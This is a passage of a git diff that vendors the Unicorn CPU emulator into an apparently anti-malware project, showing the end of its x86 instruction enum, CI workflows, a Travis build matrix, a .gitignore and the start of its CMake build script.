UC_X86_INS_VPSHUFLW, + UC_X86_INS_VPSIGNB, + UC_X86_INS_VPSIGND, + UC_X86_INS_VPSIGNW, + UC_X86_INS_VPSLLDQ, + UC_X86_INS_VPSLLD, + UC_X86_INS_VPSLLQ, + UC_X86_INS_VPSLLVD, + UC_X86_INS_VPSLLVQ, + UC_X86_INS_VPSLLW, + UC_X86_INS_VPSRAD, + UC_X86_INS_VPSRAQ, + UC_X86_INS_VPSRAVD, + UC_X86_INS_VPSRAVQ, + UC_X86_INS_VPSRAW, + UC_X86_INS_VPSRLDQ, + UC_X86_INS_VPSRLD, + UC_X86_INS_VPSRLQ, + UC_X86_INS_VPSRLVD, + UC_X86_INS_VPSRLVQ, + UC_X86_INS_VPSRLW, + UC_X86_INS_VPSUBB, + UC_X86_INS_VPSUBD, + UC_X86_INS_VPSUBQ, + UC_X86_INS_VPSUBSB, + UC_X86_INS_VPSUBSW, + UC_X86_INS_VPSUBUSB, + UC_X86_INS_VPSUBUSW, + UC_X86_INS_VPSUBW, + UC_X86_INS_VPTESTMD, + UC_X86_INS_VPTESTMQ, + UC_X86_INS_VPTESTNMD, + UC_X86_INS_VPTESTNMQ, + UC_X86_INS_VPTEST, + UC_X86_INS_VPUNPCKHBW, + UC_X86_INS_VPUNPCKHDQ, + UC_X86_INS_VPUNPCKHQDQ, + UC_X86_INS_VPUNPCKHWD, + UC_X86_INS_VPUNPCKLBW, + UC_X86_INS_VPUNPCKLDQ, + UC_X86_INS_VPUNPCKLQDQ, + UC_X86_INS_VPUNPCKLWD, + UC_X86_INS_VPXORD, + UC_X86_INS_VPXORQ, + UC_X86_INS_VPXOR, + UC_X86_INS_VRCP14PD, + UC_X86_INS_VRCP14PS, + UC_X86_INS_VRCP14SD, + UC_X86_INS_VRCP14SS, + UC_X86_INS_VRCP28PD, + UC_X86_INS_VRCP28PS, + UC_X86_INS_VRCP28SD, + UC_X86_INS_VRCP28SS, + UC_X86_INS_VRCPPS, + UC_X86_INS_VRCPSS, + UC_X86_INS_VRNDSCALEPD, + UC_X86_INS_VRNDSCALEPS, + UC_X86_INS_VRNDSCALESD, + UC_X86_INS_VRNDSCALESS, + UC_X86_INS_VROUNDPD, + UC_X86_INS_VROUNDPS, + UC_X86_INS_VROUNDSD, + UC_X86_INS_VROUNDSS, + UC_X86_INS_VRSQRT14PD, + UC_X86_INS_VRSQRT14PS, + UC_X86_INS_VRSQRT14SD, + UC_X86_INS_VRSQRT14SS, + UC_X86_INS_VRSQRT28PD, + UC_X86_INS_VRSQRT28PS, + UC_X86_INS_VRSQRT28SD, + UC_X86_INS_VRSQRT28SS, + UC_X86_INS_VRSQRTPS, + UC_X86_INS_VRSQRTSS, + UC_X86_INS_VSCATTERDPD, + UC_X86_INS_VSCATTERDPS, + UC_X86_INS_VSCATTERPF0DPD, + UC_X86_INS_VSCATTERPF0DPS, + UC_X86_INS_VSCATTERPF0QPD, + UC_X86_INS_VSCATTERPF0QPS, + UC_X86_INS_VSCATTERPF1DPD, + UC_X86_INS_VSCATTERPF1DPS, + UC_X86_INS_VSCATTERPF1QPD, + UC_X86_INS_VSCATTERPF1QPS, + UC_X86_INS_VSCATTERQPD, + UC_X86_INS_VSCATTERQPS, + UC_X86_INS_VSHUFPD, + UC_X86_INS_VSHUFPS, + UC_X86_INS_VSQRTPD, + UC_X86_INS_VSQRTPS, + UC_X86_INS_VSQRTSD, + UC_X86_INS_VSQRTSS, + UC_X86_INS_VSTMXCSR, + UC_X86_INS_VSUBPD, + UC_X86_INS_VSUBPS, + UC_X86_INS_VSUBSD, + UC_X86_INS_VSUBSS, + UC_X86_INS_VTESTPD, + UC_X86_INS_VTESTPS, + UC_X86_INS_VUNPCKHPD, + UC_X86_INS_VUNPCKHPS, + UC_X86_INS_VUNPCKLPD, + UC_X86_INS_VUNPCKLPS, + UC_X86_INS_VZEROALL, + UC_X86_INS_VZEROUPPER, + UC_X86_INS_WAIT, + UC_X86_INS_WBINVD, + UC_X86_INS_WRFSBASE, + UC_X86_INS_WRGSBASE, + UC_X86_INS_WRMSR, + UC_X86_INS_XABORT, + UC_X86_INS_XACQUIRE, + UC_X86_INS_XBEGIN, + UC_X86_INS_XCHG, + UC_X86_INS_XCRYPTCBC, + UC_X86_INS_XCRYPTCFB, + UC_X86_INS_XCRYPTCTR, + UC_X86_INS_XCRYPTECB, + UC_X86_INS_XCRYPTOFB, + UC_X86_INS_XEND, + UC_X86_INS_XGETBV, + UC_X86_INS_XLATB, + UC_X86_INS_XRELEASE, + UC_X86_INS_XRSTOR, + UC_X86_INS_XRSTOR64, + UC_X86_INS_XRSTORS, + UC_X86_INS_XRSTORS64, + UC_X86_INS_XSAVE, + UC_X86_INS_XSAVE64, + UC_X86_INS_XSAVEC, + UC_X86_INS_XSAVEC64, + UC_X86_INS_XSAVEOPT, + UC_X86_INS_XSAVEOPT64, + UC_X86_INS_XSAVES, + UC_X86_INS_XSAVES64, + UC_X86_INS_XSETBV, + UC_X86_INS_XSHA1, + UC_X86_INS_XSHA256, + UC_X86_INS_XSTORE, + UC_X86_INS_XTEST, + UC_X86_INS_FDISI8087_NOP, + UC_X86_INS_FENI8087_NOP, + + UC_X86_INS_ENDING, // mark the end of the list of insn +} uc_x86_insn; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/.github/workflows/cifuzz.yml b/ai_anti_malware/unicorn/unicorn-master/.github/workflows/cifuzz.yml new file mode 100644 index 0000000..f4259d6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/.github/workflows/cifuzz.yml @@ -0,0 +1,23 @@ +name: CIFuzz +on: [pull_request] +jobs: + Fuzzing: + runs-on: ubuntu-latest + steps: + - name: Build Fuzzers + uses: google/oss-fuzz/infra/cifuzz/actions/build_fuzzers@master + with: + oss-fuzz-project-name: 'unicorn' + dry-run: false + - name: Run Fuzzers + uses: google/oss-fuzz/infra/cifuzz/actions/run_fuzzers@master + with: + oss-fuzz-project-name: 'unicorn' + fuzz-seconds: 600 + dry-run: false + - name: Upload Crash + uses: actions/upload-artifact@v1 + if: failure() + with: + name: artifacts + path: ./out/artifacts diff --git a/ai_anti_malware/unicorn/unicorn-master/.github/workflows/python-publish.yml b/ai_anti_malware/unicorn/unicorn-master/.github/workflows/python-publish.yml new file mode 100644 index 0000000..7f0c1de --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/.github/workflows/python-publish.yml @@ -0,0 +1,67 @@ +name: PyPI 📦 Distribution + +on: [push] + +jobs: + build: + runs-on: ${{ matrix.os }} + strategy: + fail-fast: false + matrix: + os: [windows-latest, macos-latest, ubuntu-latest] + platform: [x32, x64] + steps: + - uses: actions/checkout@v2 + + - name: Set up Python + uses: actions/setup-python@v2 + with: + python-version: '3.x' + + - name: Set up MSVC + if: matrix.os == 'windows-latest' + uses: microsoft/setup-msbuild@v1 + + - name: Install dependencies + run: | + pip install setuptools wheel + + - name: Build distribution 📦 + shell: bash + run: | + if [ ${{ matrix.platform }} == 'x32' ] && [ ${{ matrix.os }} == 'windows-latest' ]; then + cd bindings/python && python setup.py build -p win32 sdist bdist_wheel -p win32 + rm dist/*.tar.gz + elif [ ${{ matrix.platform }} == 'x32' ] && [ ${{ matrix.os }} == 'ubuntu-latest' ]; then + docker run --rm -v `pwd`/:/work dockcross/manylinux1-x86 > ./dockcross + chmod +x ./dockcross + ./dockcross bindings/python/build_wheel.sh + elif [ ${{ matrix.platform }} == 'x64' ] && [ ${{ matrix.os }} == 'ubuntu-latest' ]; then + docker run --rm -v `pwd`/:/work dockcross/manylinux1-x64 > ./dockcross + chmod +x ./dockcross + ./dockcross bindings/python/build_wheel.sh + elif [ ${{ matrix.platform }} == 'x32' ] && [ ${{ matrix.os }} == 'macos-latest' ]; then + cd bindings/python && python setup.py sdist + else + cd bindings/python && python setup.py bdist_wheel + fi + + - uses: actions/upload-artifact@v2 + with: + path: ${{ github.workspace }}/bindings/python/dist/* + + publish: + needs: [build] + runs-on: ubuntu-latest + if: startsWith(github.ref, 'refs/tags') + steps: + - uses: actions/download-artifact@v2 + with: + name: artifact + path: dist + + - name: Publish distribution 📦 to PyPI + uses: pypa/gh-action-pypi-publish@master + with: + user: __token__ + password: ${{ secrets.pypi_pass }} diff --git a/ai_anti_malware/unicorn/unicorn-master/.gitignore b/ai_anti_malware/unicorn/unicorn-master/.gitignore new file mode 100644 index 0000000..18fd949 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/.gitignore @@ -0,0 +1,101 @@ +.DS_Store +*.swp +*.d +*.o +*.a +*.dSYM +*.so +*.so.* +*.exe +*.dll +*.class +*.jar +*~ + +qemu/config-all-devices.mak + +qemu/aarch64-softmmu/ +qemu/aarch64eb-softmmu/ +qemu/arm-softmmu/ +qemu/armeb-softmmu/ +qemu/m68k-softmmu/ +qemu/mips64el-softmmu/ +qemu/mips64-softmmu/ +qemu/mipsel-softmmu/ +qemu/mips-softmmu/ +qemu/sparc64-softmmu/ +qemu/sparc-softmmu/ +qemu/i386-softmmu/ +qemu/x86_64-softmmu/ +qemu/ppc-softmmu/ +qemu/ppc64-softmmu/ + +tags +qemu/config-host.ld +qemu/config.log +qemu/config.status +qemu/config-host.h +qemu/config-host.h-timestamp +qemu/config-host.mak + +libunicorn*.dll +libunicorn*.so +libunicorn*.dylib + +unicorn.pc + +unicorn.lib +unicorn.dll +unicorn.exp +unicorn.def +unicorn_*.lib +unicorn_*.exp +unicorn_*.dll + + +*.tgz +*.zip +*.pyc +_*.txt +_*.diff +tmp/ + +bindings/python/build/ +bindings/python/dist/ +bindings/python/src/ +bindings/python/unicorn.egg-info/ +bindings/python/unicorn/lib/ +bindings/python/unicorn/include/ +bindings/python/MANIFEST +config.log + + +################# +## Visual Studio +################# + +## Ignore Visual Studio temporary files, build results, and +## files generated by popular Visual Studio add-ons. + +# vscode +.vscode +.vscode/ + +# User-specific files +*.opensdf +*.sdf +*.suo +*.user +*.sln.docstates + +# Build results + +[Dd]ebug/ +[Rr]elease/ +x64/ +Win32/ +build/ +[Bb]in/ +[Oo]bj/ +packages/ +cmocka/ diff --git a/ai_anti_malware/unicorn/unicorn-master/.travis.yml b/ai_anti_malware/unicorn/unicorn-master/.travis.yml new file mode 100644 index 0000000..c08466b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/.travis.yml @@ -0,0 +1,353 @@ +language: c +env: + - PATH=$PATH:/usr/local/opt/binutils/bin +script: + - | + if [[ "$TRAVIS_OS_NAME" == "windows" ]]; then + if [[ "$TRAVIS_COMPILER" == "clang" ]]; then + choco install cygwin cyg-get && \ + cyg-get.bat default autoconf automake make gcc-core clang pkg-config libpcre-devel cmake python27-setuptools ruby wget && \ + export SHELLOPTS && set -o igncr && \ + cmd.exe //C "C:\\tools\\cygwin\\bin\\bash.exe -lc 'cd /cygdrive/$TRAVIS_BUILD_DIR; make header; make'" + else + choco install cygwin cyg-get && \ + cyg-get.bat default autoconf automake make gcc-core clang pkg-config libpcre-devel cmake python27-setuptools ruby wget && \ + export SHELLOPTS && set -o igncr && \ + cmd.exe //C "C:\\tools\\cygwin\\bin\\bash.exe -lc 'cd /cygdrive/$TRAVIS_BUILD_DIR; make header; make; ./install-cmocka-linux.sh; export PATH="$PATH":/cygdrive/$TRAVIS_BUILD_DIR:/cygdrive/$TRAVIS_BUILD_DIR/cmocka/src; make test'" + fi + elif [[ "$TRAVIS_CPU_ARCH" == "arm64" ]]; then + make header && make && make -C tests/unit test && make -C tests/regress test + else + make header && make && make -C bindings/go && make -C bindings/go test && make test + fi +compiler: + - clang + - gcc +os: + - linux + - windows +arch: + - amd64 + - arm64 +matrix: + fast_finish: true + exclude: + - os: windows + arch: arm64 + include: + + - name: "Compiler: clang C" + os: osx + osx_image: xcode10.1 + python: 3.7 + compiler: clang + before_cache: + - brew cleanup + - find /usr/local/Homebrew \! -regex ".+\.git.+" -delete; + cache: + directories: + - $HOME/Library/Caches/Homebrew + - /usr/local/Homebrew + before_install: + - cd /usr/local/Homebrew/Library/Taps/homebrew/homebrew-core && git stash && git clean -d -f + script: + - cd $TRAVIS_BUILD_DIR + - make header && make && make -C bindings/go && make -C bindings/go test && make test + + - name: "Compiler: gcc C" + os: osx + osx_image: xcode10.1 + python: 3.7 + compiler: gcc + before_cache: + - brew cleanup + - find /usr/local/Homebrew \! -regex ".+\.git.+" -delete; + cache: + directories: + - $HOME/Library/Caches/Homebrew + - /usr/local/Homebrew + before_install: + - cd /usr/local/Homebrew/Library/Taps/homebrew/homebrew-core && git stash && git clean -d -f + script: + - cd $TRAVIS_BUILD_DIR + - make header && make && make -C bindings/go && make -C bindings/go test && make test + + - name: "Linux clang ASAN" + os: linux + compiler: clang + env: + - PATH=$PATH:/usr/local/opt/binutils/bin + - ASAN_OPTIONS=detect_leaks=0 + - CXXFLAGS="-DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=address -fsanitize=fuzzer-no-link" + - CFLAGS="-DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=address -fsanitize=fuzzer-no-link" + - LDFLAGS="-fsanitize=address" + script: + - make header && make + - make -C tests/fuzz && sh tests/fuzz/dlcorpus.sh + + - name: "Linux clang MSAN" + os: linux + compiler: clang + env: + - PATH=$PATH:/usr/local/opt/binutils/bin + - ASAN_OPTIONS=detect_leaks=0 + - CXXFLAGS="-DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=memory -fsanitize=fuzzer-no-link" + - CFLAGS="-DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=memory -fsanitize=fuzzer-no-link" + - LDFLAGS="-fsanitize=memory" + script: + - make header && make + - make -C tests/fuzz && sh tests/fuzz/dlcorpus.sh + + - name: "Linux clang USAN" + os: linux + compiler: clang + env: + - PATH=$PATH:/usr/local/opt/binutils/bin + - ASAN_OPTIONS=detect_leaks=0 + - CXXFLAGS="-DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=undefined -fsanitize=fuzzer-no-link" + - CFLAGS="-DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=undefined -fsanitize=fuzzer-no-link" + - LDFLAGS="-fsanitize=undefined" + script: + - make header && make + - make -C tests/fuzz && sh tests/fuzz/dlcorpus.sh + + - name: "Linux 32bit" + os: linux + compiler: gcc + env: + - CFLAGS="-m32" LDFLAGS="-m32" LDFLAGS_STATIC="-m32" UNICORN_QEMU_FLAGS="--cpu=i386" + - PATH=$PATH:/usr/local/opt/binutils/bin + script: make header && make && make -C tests/unit test && make -C tests/regress test + addons: + apt: + packages: + - lib32ncurses5-dev + - lib32z1-dev + - libpthread-stubs0-dev + - lib32gcc-4.8-dev + - libc6-dev-i386 + - gcc-multilib + - libcmocka-dev:i386 + + - name: "Linux Cmake 32bit" + os: linux + compiler: gcc + env: + - CFLAGS="-m32" LDFLAGS="-m32" LDFLAGS_STATIC="-m32" UNICORN_QEMU_FLAGS="--cpu=i386" + - PATH=$PATH:/usr/local/opt/binutils/bin + script: + - mkdir build + - cd build + - ../cmake.sh x86 + - cp libunicorn.* ../ + - make -C ../tests/unit test && make -C ../tests/regress test + addons: + apt: + packages: + - lib32ncurses5-dev + - lib32z1-dev + - libpthread-stubs0-dev + - lib32gcc-4.8-dev + - libc6-dev-i386 + - gcc-multilib + - libcmocka-dev:i386 + + - name: "Linux Cmake 64bit" + os: linux + compiler: gcc + env: + - PATH=$PATH:/usr/local/opt/binutils/bin + script: + - mkdir build + - cd build + - ../cmake.sh + - cp libunicorn.* ../ + - make -C ../tests/unit test && make -C ../tests/regress test + + - name: "Linux Cmake Static 32bit" + os: linux + compiler: gcc + env: + - CFLAGS="-m32" LDFLAGS="-m32" LDFLAGS_STATIC="-m32" UNICORN_QEMU_FLAGS="--cpu=i386" + - PATH=$PATH:/usr/local/opt/binutils/bin + script: + - mkdir build + - cd build + - cmake -DCMAKE_BUILD_TYPE=Release -DUNICORN_ARCH=x86 -DUNICORN_BUILD_SHARED=OFF .. && make -j8 +# temporarily disable test for static build +# - cp libunicorn.* ../ +# - make -C ../tests/unit test && make -C ../tests/regress test + addons: + apt: + packages: + - lib32ncurses5-dev + - lib32z1-dev + - libpthread-stubs0-dev + - lib32gcc-4.8-dev + - libc6-dev-i386 + - gcc-multilib + - libcmocka-dev:i386 + + - name: "Linux Cmake Static 64bit" + os: linux + compiler: gcc + env: + - PATH=$PATH:/usr/local/opt/binutils/bin + script: + - mkdir build + - cd build + - cmake -DCMAKE_BUILD_TYPE=Release -DUNICORN_BUILD_SHARED=OFF .. && make -j8 +# - cp libunicorn.* ../ +# - make -C ../tests/unit test && make -C ../tests/regress test + + - name: "MacOSX brew" + os: osx + osx_image: xcode10.1 + python: 3.7 + before_cache: + - brew cleanup + - find /usr/local/Homebrew \! -regex ".+\.git.+" -delete; + cache: + directories: + - $HOME/Library/Caches/Homebrew + - /usr/local/Homebrew + before_install: + - cd /usr/local/Homebrew/Library/Taps/homebrew/homebrew-core && git stash && git clean -d -f + script: + - brew install --HEAD unicorn + - brew test unicorn + + - name: "Windows nmake 32bit" + os: windows + language: shell + script: + - mkdir build + - cd build + - cmd.exe //C 'C:\Program Files (x86)\Microsoft Visual Studio\2017\BuildTools\VC\Auxiliary\Build\vcvarsall.bat' x86 '&' cmd.exe //C '..\nmake.bat' x86 + + - name: "Windows nmake 64bit" + os: windows + language: shell + script: + - mkdir build + - cd build + - cmd.exe //C 'C:\Program Files (x86)\Microsoft Visual Studio\2017\BuildTools\VC\Auxiliary\Build\vcvarsall.bat' amd64 '&' cmd.exe //C '..\nmake.bat' + + - name: "Windows MSVC 32bit" + os: windows + language: shell + env: + - MSBUILD_PATH="C:\Program Files (x86)\Microsoft Visual Studio\2017\BuildTools\MSBuild\15.0\Bin" + script: + - PATH=$MSBUILD_PATH:$PATH + - cmd.exe //C 'msbuild.exe msvc/unicorn.sln /m:2 /nologo /p:Configuration=Release /p:Platform=Win32' + + - name: "Windows MSVC 64bit" + os: windows + language: shell + env: + - MSBUILD_PATH="C:\Program Files (x86)\Microsoft Visual Studio\2017\BuildTools\MSBuild\15.0\Bin" + script: + - PATH=$MSBUILD_PATH:$PATH + - cmd.exe //C 'msbuild.exe msvc/unicorn.sln /m:2 /nologo /p:Configuration=Release /p:Platform=x64' + + - name: "Windows MSYS2/MinGW32" + os: windows + language: shell + env: + - PATH=/C/tools/msys64/mingw32/bin:$PATH + before_install: + - | + if [[ ! -f /C/tools/msys64/msys2_shell.cmd ]]; then + rm -rf /C/tools/msys64 + fi + - choco uninstall -y mingw + - choco upgrade --no-progress -y msys2 + - export msys2='cmd //C RefreshEnv.cmd ' + - export msys2+='& set MSYS=winsymlinks:nativestrict ' + - export msys2+='& C:\\tools\\msys64\\msys2_shell.cmd -defterm -no-start' + - export shell="$msys2 -mingw32 -full-path -here -c \$\* --" + - export msys2+=" -msys2 -c \$\* --" + - $msys2 pacman --sync --noconfirm --needed \ + autoconf \ + automake \ + make \ + perl \ + python \ + mingw-w64-i686-libtool \ + mingw-w64-i686-toolchain \ + mingw-w64-i686-gcc \ + mingw-w64-i686-cmake \ + mingw-w64-i686-cmocka \ + mingw-w64-i686-python3-setuptools \ + unzip + - export CPPFLAGS=-D__USE_MINGW_ANSI_STDIO=1 + - export CC=i686-w64-mingw32-gcc + - export AR=gcc-ar + - export RANLIB=gcc-ranlib + - export CFLAGS="-m32" + - export LDFLAGS="-m32" + - export LDFLAGS_STATIC="-m32" + - export UNICORN_QEMU_FLAGS="--cpu=i386" +# before_cache: +# - $msys2 pacman --sync --clean --noconfirm +# cache: +# timeout: +# 1000 +# directories: +# - $HOME/AppData/Local/Temp/chocolatey +# - /C/tools/msys64 + script: + - $shell make header; $shell make; cp unicorn.dll /C/Windows/SysWOW64/; $shell make test + + - name: "Windows MSYS2/MinGW64" + os: windows + language: shell + env: + - PATH=/C/tools/msys64/mingw64/bin:$PATH + before_install: + - | + if [[ ! -f /C/tools/msys64/msys2_shell.cmd ]]; then + rm -rf /C/tools/msys64 + fi + - choco uninstall -y mingw + - choco upgrade --no-progress -y msys2 + - export msys2='cmd //C RefreshEnv.cmd ' + - export msys2+='& set MSYS=winsymlinks:nativestrict ' + - export msys2+='& C:\\tools\\msys64\\msys2_shell.cmd -defterm -no-start' + - export shell="$msys2 -mingw64 -full-path -here -c \$\* --" + - export msys2+=" -msys2 -c \$\* --" + - $msys2 pacman --sync --noconfirm --needed \ + autoconf \ + automake \ + make \ + perl \ + python \ + mingw-w64-x86_64-libtool \ + mingw-w64-x86_64-toolchain \ + mingw-w64-x86_64-cmake \ + mingw-w64-x86_64-cmocka \ + mingw-w64-x86_64-python3-setuptools + unzip + - export CPPFLAGS=-D__USE_MINGW_ANSI_STDIO=1 + - export CC=x86_64-w64-mingw32-gcc + - export AR=gcc-ar + - export RANLIB=gcc-ranlib +# before_cache: +# - $msys2 pacman --sync --clean --noconfirm +# cache: +# timeout: +# 1000 +# directories: +# - $HOME/AppData/Local/Temp/chocolatey +# - /C/tools/msys64 + script: + - $shell make header; $shell make; cp unicorn.dll /C/Windows/System32/; $shell make test +addons: + apt: + packages: + - libpthread-stubs0-dev + - libcmocka-dev + homebrew: + update: true + brewfile: true diff --git a/ai_anti_malware/unicorn/unicorn-master/AUTHORS.TXT b/ai_anti_malware/unicorn/unicorn-master/AUTHORS.TXT new file mode 100644 index 0000000..5d4ea77 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/AUTHORS.TXT @@ -0,0 +1,2 @@ +Nguyen Anh Quynh +Dang Hoang Vu diff --git a/ai_anti_malware/unicorn/unicorn-master/Brewfile b/ai_anti_malware/unicorn/unicorn-master/Brewfile new file mode 100644 index 0000000..82c6563 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/Brewfile @@ -0,0 +1,6 @@ +# Travis CI setup for MacOS Brew + +# used for testing framework +brew "cmocka" +# used for cross assembly of code for testing +brew "crosstool-ng" diff --git a/ai_anti_malware/unicorn/unicorn-master/CMakeLists.txt b/ai_anti_malware/unicorn/unicorn-master/CMakeLists.txt new file mode 100644 index 0000000..c2b4da1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/CMakeLists.txt @@ -0,0 +1,980 @@ +# Tested on window10(x64) with vs2019. +# Open the "x86 Native Tools Command Prompt for VS 2019", +# cd ${UNICORN_SOURCE_DIR} +# mkdir build +# cd build +# cmake -G "NMake Makefiles" .. +# nmake +# Or Open "x64 Native Tools Command Prompt for VS 2019" for 64bit binary. +# Tested on Ubuntu-1804-amd64 with gcc. +# $ cd ${UNICORN_SOURCE_DIR} +# $ mkdir build +# $ cd build +# $ cmake .. +# $ make +# By Huitao Chen, 2019 + +cmake_minimum_required(VERSION 3.1) +project(unicorn C) + +set(UNICORN_VERSION_MAJOR 1) +set(UNICORN_VERSION_MINOR 0) +set(UNICORN_VERSION_PATCH 2) + +option(UNICORN_BUILD_SHARED "Build shared instead of static library" ON) + +if (NOT UNICORN_ARCH) + # build all architectures + set(UNICORN_ARCH "x86 arm aarch64 m68k mips sparc") +endif() + +string(TOUPPER ${UNICORN_ARCH} UNICORN_ARCH) +string(REPLACE " " ";" UNICORN_ARCH_LIST ${UNICORN_ARCH}) + +foreach(ARCH_LOOP ${UNICORN_ARCH_LIST}) + set(UNICORN_HAS_${ARCH_LOOP} TRUE) +endforeach(ARCH_LOOP) + +# qemu uses assert(). It is not recommended to define NDEBUG if using assert() +# to detect error conditions since the software may behave +# non-deterministically. Remove the NDEBUG macro. +if(CMAKE_BUILD_TYPE STREQUAL "Release") + string(REPLACE "-DNDEBUG" "" CMAKE_C_FLAGS_RELEASE ${CMAKE_C_FLAGS_RELEASE}) +endif() + +if(MSVC) + include_directories( + ${CMAKE_CURRENT_SOURCE_DIR}/msvc/unicorn + ) +else() + include_directories( + ${CMAKE_BINARY_DIR} + ) +endif() + +include_directories( + qemu + qemu/include + qemu/tcg + include +) + +if(MSVC) + if(CMAKE_SIZEOF_VOID_P EQUAL 8) + set(MSVC_FLAG -D__x86_64__) + elseif(CMAKE_SIZEOF_VOID_P EQUAL 4) + set(MSVC_FLAG -D__i386__) + else() + message(FATAL_ERROR "Neither WIN64 or WIN32!") + endif() + add_compile_options( + -Dinline=__inline + -D__func__=__FUNCTION__ + -D_CRT_SECURE_NO_WARNINGS + -DWIN32_LEAN_AND_MEAN + ${MSVC_FLAG} + /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/tcg/i386 + /wd4018 /wd4244 /wd4267 + ) + if(CMAKE_BUILD_TYPE STREQUAL "Debug") + string(REPLACE "/ZI" "/Zi" CMAKE_C_FLAGS_DEBUG ${CMAKE_C_FLAGS_DEBUG}) + endif() + # default use the multithread, static version of the run-time library. + option(UNICORN_STATIC_MSVCRT "Embed static runtime library" ON) + if (UNICORN_STATIC_MSVCRT) + string(REPLACE "/MD" "/MT" CMAKE_C_FLAGS_DEBUG ${CMAKE_C_FLAGS_DEBUG}) + string(REPLACE "/MD" "/MT" CMAKE_C_FLAGS_RELEASE ${CMAKE_C_FLAGS_RELEASE}) + endif() +else() + # detect host arch. + execute_process(COMMAND ${CMAKE_C_COMPILER} -dM -E - + INPUT_FILE /dev/null + OUTPUT_VARIABLE UC_COMPILER_MACRO) + + while(TRUE) + string(FIND ${UC_COMPILER_MACRO} "__x86_64__" UC_RET) + if (${UC_RET} GREATER "0") + set(UNICORN_TARGET_ARCH "i386") + break() + endif() + string(FIND ${UC_COMPILER_MACRO} "__i386__" UC_RET) + if (${UC_RET} GREATER "0") + set(UNICORN_TARGET_ARCH "i386") + break() + endif() + string(FIND ${UC_COMPILER_MACRO} "__arm__" UC_RET) + if (${UC_RET} GREATER "0") + set(UNICORN_TARGET_ARCH "arm") + break() + endif() + string(FIND ${UC_COMPILER_MACRO} "__aarch64__" UC_RET) + if (${UC_RET} GREATER "0") + set(UNICORN_TARGET_ARCH "aarch64") + break() + endif() + string(FIND ${UC_COMPILER_MACRO} "__mips__" UC_RET) + if (${UC_RET} GREATER "0") + set(UNICORN_TARGET_ARCH "mips") + break() + endif() + string(FIND ${UC_COMPILER_MACRO} "__sparc__" UC_RET) + if (${UC_RET} GREATER "0") + set(UNICORN_TARGET_ARCH "sparc") + break() + endif() + string(FIND ${UC_COMPILER_MACRO} "__ia64__" UC_RET) + if (${UC_RET} GREATER "0") + set(UNICORN_TARGET_ARCH "ia64") + break() + endif() + string(FIND ${UC_COMPILER_MACRO} "_ARCH_PPC" UC_RET) + if (${UC_RET} GREATER "0") + set(UNICORN_TARGET_ARCH "ppc") + break() + endif() + string(FIND ${UC_COMPILER_MACRO} "__s390__" UC_RET) + if (${UC_RET} GREATER "0") + set(UNICORN_TARGET_ARCH "s390") + break() + endif() + message(FATAL_ERROR "Unknown host compiler: ${CMAKE_C_COMPILER}.") + endwhile(TRUE) + + set(EXTRA_CFLAGS "--extra-cflags=") + if (UNICORN_HAS_X86) + set (EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_X86 ") + endif() + if (UNICORN_HAS_ARM) + set (EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_ARM -DUNICORN_HAS_ARMEB ") + endif() + if (UNICORN_HAS_AARCH64) + set (EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_ARM64 -DUNICORN_HAS_ARM64EB ") + endif() + if (UNICORN_HAS_M68K) + set (EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_M68K ") + endif() + if (UNICORN_HAS_MIPS) + set (EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_MIPS -DUNICORN_HAS_MIPSEL -DUNICORN_HAS_MIPS64 -DUNICORN_HAS_MIPS64EL ") + endif() + if (UNICORN_HAS_SPARC) + set (EXTRA_CFLAGS "${EXTRA_CFLAGS}-DUNICORN_HAS_SPARC ") + endif() + set (EXTRA_CFLAGS "${EXTRA_CFLAGS}-fPIC -fvisibility=hidden") + + set(TARGET_LIST "--target-list=") + if (UNICORN_HAS_X86) + set (TARGET_LIST "${TARGET_LIST}x86_64-softmmu, ") + endif() + if (UNICORN_HAS_ARM) + set (TARGET_LIST "${TARGET_LIST}arm-softmmu, armeb-softmmu, ") + endif() + if (UNICORN_HAS_AARCH64) + set (TARGET_LIST "${TARGET_LIST}aarch64-softmmu, aarch64eb-softmmu, ") + endif() + if (UNICORN_HAS_M68K) + set (TARGET_LIST "${TARGET_LIST}m68k-softmmu, ") + endif() + if (UNICORN_HAS_MIPS) + set (TARGET_LIST "${TARGET_LIST}mips-softmmu, mipsel-softmmu, mips64-softmmu, mips64el-softmmu, ") + endif() + if (UNICORN_HAS_SPARC) + set (TARGET_LIST "${TARGET_LIST}sparc-softmmu, sparc64-softmmu, ") + endif() + set (TARGET_LIST "${TARGET_LIST} ") + + # GEN config-host.mak & target directories + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/configure + ${EXTRA_CFLAGS} + ${TARGET_LIST} + WORKING_DIRECTORY ${CMAKE_BINARY_DIR} + ) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/config-host.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/config-host.h + ) + if (UNICORN_HAS_X86) + execute_process(COMMAND sh ${CMAKE_CURRENT_SOURCE_DIR}/qemu/scripts/create_config + INPUT_FILE ${CMAKE_BINARY_DIR}/x86_64-softmmu/config-target.mak + OUTPUT_FILE ${CMAKE_BINARY_DIR}/x86_64-softmmu/config-target.h + ) + endif() + if 